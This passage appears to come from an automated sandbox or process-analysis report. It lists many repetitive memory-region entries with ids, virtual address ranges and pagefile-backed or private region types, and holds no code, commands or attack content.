"pagefile_0x00000000002a0000" filename = "" Region: id = 21341 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21342 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21343 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21344 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21345 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21346 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21347 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21348 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21349 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21350 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21351 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21352 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21353 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21354 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21355 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21356 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21357 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21358 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21359 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21361 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21362 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21363 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21364 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21365 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21366 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21367 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21368 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21369 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21370 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21371 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21372 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21373 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21374 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21375 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21410 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21411 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21412 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21413 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21414 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21415 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21416 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21417 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21418 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21419 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21420 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21421 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21422 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21423 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21424 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21425 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21426 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21427 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21428 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21429 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21430 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21431 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21432 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21433 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21434 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21435 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21436 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21437 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21438 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21439 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21440 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21441 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21442 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21443 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21444 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21445 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21446 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21447 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21448 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21449 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21450 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21451 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21452 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21453 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21454 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21455 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21456 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21457 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21458 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21459 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21460 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21461 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21462 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21463 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21464 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21465 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21466 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21467 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21468 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21469 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21470 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21471 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21472 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21473 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21474 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21475 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21476 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21487 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21488 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21489 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21490 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21491 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21492 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21493 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21494 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21495 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21496 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21541 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21542 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21543 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21544 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21545 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21546 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21547 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21548 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21549 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21550 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21595 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21596 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21597 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21598 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21599 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21600 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21601 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21602 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21603 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21604 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21683 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21684 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21685 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21686 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21687 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21688 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21689 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21690 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21691 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21692 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21737 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21738 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21739 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21740 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21741 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21742 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21743 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21744 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21745 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21746 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21825 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21826 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21827 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21828 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21829 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21840 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21841 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21842 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21843 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21844 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21947 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21948 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21949 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21950 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21951 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21958 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21959 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21960 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21961 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21962 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22001 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22002 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22003 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22004 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22005 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22011 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22012 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22013 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22014 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22015 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22105 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22106 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22107 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22108 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22109 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22115 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22116 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22117 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22118 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22119 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22202 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22203 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22204 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22205 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22206 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22212 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22213 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22214 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22215 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22216 start_va = 0x2a0000 end_va = 